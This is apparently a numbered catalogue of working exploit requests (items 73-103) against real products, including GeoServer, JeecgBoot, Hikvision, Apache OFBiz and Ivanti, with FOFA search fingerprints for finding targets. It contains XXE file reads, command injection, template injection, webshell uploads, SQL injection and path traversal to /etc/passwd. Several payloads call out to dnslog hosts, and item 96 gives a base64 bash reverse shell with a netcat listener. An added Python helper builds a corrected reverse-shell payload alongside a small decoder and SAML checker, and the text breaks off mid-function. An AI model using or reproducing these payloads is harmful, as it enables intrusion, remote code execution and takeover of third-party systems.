S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
Same upload handler as PoC 93 (same submit_post and __hash__ fields), reached through a different import action:

POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verification (the file name must match the one uploaded in this request, cciytdzu.txt, not the one from PoC 93):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
The ";/" suffix on the path together with requirePasswordChange=Y gets the request past the login check, and the <serializable> extension element makes the XML-RPC handler deserialize the embedded Java object, so any ysoserial gadget chain runs.

POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The script throws the command output as an exception, so it comes back in the error message.

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Caveat: the base64 in this PoC decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, i.e. the spaces are URL-encoded as %20, which bash will not treat as a command line. Re-encode bash -i >& /dev/tcp/<listener-ip>/7777 0>&1 with literal spaces for your own listener address.

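Added example (not code from the original post or from the OFBiz project): a Python helper that shows what the base64 stage in PoC 96 actually hands to bash, and builds the same {echo,...}|{base64,-d}|{bash,-i} groovy program with a correctly encoded command. The listener address 192.168.40.128:7777 is the one the PoC uses. extract_command_from_body is the defender-side inverse: given a captured request body, it recovers the real command so a proxy log or WAF event can be read at a glance.

```python
import base64
import urllib.parse

# The base64 stage exactly as it appears in PoC 96 above.
PAGE_BLOB = "YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ=="


def decode_blob(blob: str) -> str:
    """What {echo,<blob>}|{base64,-d}|{bash,-i} will actually hand to bash."""
    return base64.b64decode(blob).decode()


def reverse_shell_command(listener_ip: str, listener_port: int) -> str:
    # Plain bash reverse shell with literal spaces, no URL encoding.
    return f"bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"


def groovy_program(command: str) -> str:
    """Groovy source in the shape of the PoC: the command travels base64-encoded and the
    bash stages use brace expansion, so the groovy string itself needs no quoting."""
    blob = base64.b64encode(command.encode()).decode()
    return f"'bash -c {{echo,{blob}}}|{{base64,-d}}|{{bash,-i}}'.execute();"


def form_body(program: str) -> str:
    """application/x-www-form-urlencoded body for /webtools/control/ProgramExport."""
    return urllib.parse.urlencode({"groovyProgram": program})


def extract_command_from_body(body: str) -> str:
    """Defender-side inverse: read the real command out of a captured request body by
    locating the {echo,<blob>} stage and decoding the blob."""
    program = urllib.parse.parse_qs(body)["groovyProgram"][0]
    start = program.index("{echo,") + len("{echo,")
    end = program.index("}", start)
    return decode_blob(program[start:end])


if __name__ == "__main__":
    print("PoC blob decodes to:", repr(decode_blob(PAGE_BLOB)))
    body = form_body(groovy_program(reverse_shell_command("192.168.40.128", 7777)))
    print("corrected body:", body)
    print("which decodes back to:", extract_command_from_body(body))
```

Running it prints the %20-encoded string for the PoC blob and a corrected body whose blob decodes to a command with real spaces; the same extract_command_from_body call works on the PoC body as published.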
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
PAYLOAD stands for the encrypted Shiro rememberMe cookie (the PoC is abbreviated); the command to run is passed in the X-Token-Data header.

GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

Decoded, the script parameter is }Java.type('java.lang.Runtime').getRuntime().exec('ping a4xs0nop.dnslog.pw');{ . The server wraps the script in a JavaScript function body before evaluating it, so the leading } closes that body and the exec call runs at save time.

99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

Decoded body: {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}. The ping argument reaches a shell unescaped, so whatever follows the | is executed.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
The traversal from the unauthenticated /api/v1/totp/user-backup-code/ path reaches /api/v1/license/keys-status/, whose path segment is passed to a shell; %3b is a ";" and the curl callback to the dnslog host confirms execution.

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
The SAML endpoint resolves the ds:RetrievalMethod URI server-side before the signature is checked; a callback on the dnslog host confirms the SSRF.

POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML; the parameter entity makes the parser fetch the external DTD from the dnslog host:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
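Added example for PoCs 102 and 103 (not code from the original post or from Ivanti): a Python checker for the two request shapes. It decodes a SAMLRequest value (both the HTTP-POST binding, plain base64, and the HTTP-Redirect binding, raw DEFLATE then base64) and flags DTD declarations, and it scans a ds:Signature for RetrievalMethod or Reference URIs that the server would have to fetch from a host we do not own. The sample documents are constructed here from the two PoCs; the host name vpn.example.com in OWN_HOSTS is an assumption.

```python
import base64
import re
import zlib
from urllib.parse import urlparse

# Constructed samples. XXE_XML is the document PoC 103 base64-encodes into SAMLRequest;
# SSRF_SOAP has the ds:Signature/KeyInfo shape of PoC 102 with its dnslog callback.
XXE_XML = ('<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM '
           '"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>')
BENIGN_XML = ('<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
              'ID="_a1b2" Version="2.0" IssueInstant="2024-03-01T00:00:00Z"/>')
SSRF_SOAP = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
             '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
             '<ds:Reference URI="#_a1b2"/></ds:SignedInfo><ds:KeyInfo>'
             '<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
             '</ds:Signature></soap:Body></soap:Envelope>')
OWN_HOSTS = {"vpn.example.com"}   # assumption: the appliance's own host name(s)


def post_binding(xml: str) -> str:
    """SAMLRequest as the HTTP-POST binding sends it: plain base64."""
    return base64.b64encode(xml.encode()).decode()


def redirect_binding(xml: str) -> str:
    """SAMLRequest as the HTTP-Redirect binding sends it: raw DEFLATE, then base64."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(xml.encode()) + c.flush()).decode()


def decode_saml_request(value: str) -> str:
    raw = base64.b64decode(value)
    if raw.startswith(b"<"):                       # POST binding: already XML
        return raw.decode("utf-8", "replace")
    return zlib.decompress(raw, -15).decode("utf-8", "replace")   # Redirect binding


def find_dtd(xml: str):
    """DTD declarations and the SYSTEM URLs inside them. A SAML message never needs
    a DTD, so anything returned here is a reason to reject the request outright."""
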